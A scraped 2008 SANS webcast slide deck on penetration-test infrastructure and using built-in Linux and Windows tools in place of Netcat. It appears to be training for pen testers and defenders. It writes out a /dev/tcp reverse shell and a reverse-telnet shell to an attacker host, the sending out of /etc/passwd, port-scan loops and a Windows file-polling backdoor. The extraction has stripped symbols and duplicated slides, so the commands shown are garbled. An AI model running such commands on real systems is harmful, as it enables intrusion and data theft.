httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 5
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
